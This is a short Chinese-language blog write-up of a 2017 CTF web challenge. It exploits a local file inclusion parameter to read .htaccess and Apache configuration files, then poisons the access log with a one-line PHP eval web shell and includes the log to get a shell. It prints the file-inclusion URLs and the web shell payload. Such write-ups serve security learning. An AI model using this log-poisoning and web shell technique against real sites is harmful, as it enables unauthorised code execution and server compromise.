Chybeta

SHACTF-2017-Web-writeup

发表于 | 分类于 | 阅读次数

SHACTF-2017-Web-writeup

Bon Appétit (100)

Methon One

1
bonappetit.stillhackinganyway.nl

有个page参数。访问:

1
view-source:http://bonappetit.stillhackinganyway.nl/?page=.htaccess

得到有个 suP3r_S3kr1t_Fl4G 。访问:

1
2
http://bonappetit.stillhackinganyway.nl/
?page=suP3r_S3kr1t_Fl4G

得到flag:

1
flag{82d8173445ea865974fc0569c5c7cf7f}

感谢lzhtony和各位大佬的帮忙,不然我还一直沉浸在log的世界里不能自拔。。

Methon Two

有包含,那就可以包含日志。由于题目有提到apache的log。所以有必要去看看log保存在什么地方。访问:

1
2
http://bonappetit.stillhackinganyway.nl/
?page=//etc/apache2/sites-enabled/000-default.conf

error.log在默认位置,而CustomLog在由var/www/html/log.sh决定。接下来我们访问:

1
2
http://bonappetit.stillhackinganyway.nl/
?page=//var/www/html/log.sh

可以知道,我们访问这个页面的log,会被保存到/var/www/html/logs/${HOST}.log中,而${HOST}即为你的ip地址。

接下来我们正式利用log来getshell。

在自己的vps(具有公网ip)上,访问

1
http://bonappetit.stillhackinganyway.nl/<?php @eval($_POST['test']);?>

并用burp截包修改被转义的字符。如下,之后将其转发出去。

接下来包含自己对应主机的log文件。

1
http://bonappetit.stillhackinganyway.nl/?page=//var/www/html/logs/yourvpsip.log

用菜刀连上,密码为test。

最终得到flag:

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:SHACTF-2017-Web-writeup

文章作者:chybeta

发布时间:2017年08月06日 - 22:08

最后更新:2017年08月07日 - 18:08

原始链接:http://chybeta.github.io/2017/08/06/SHACTF-2017-Web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。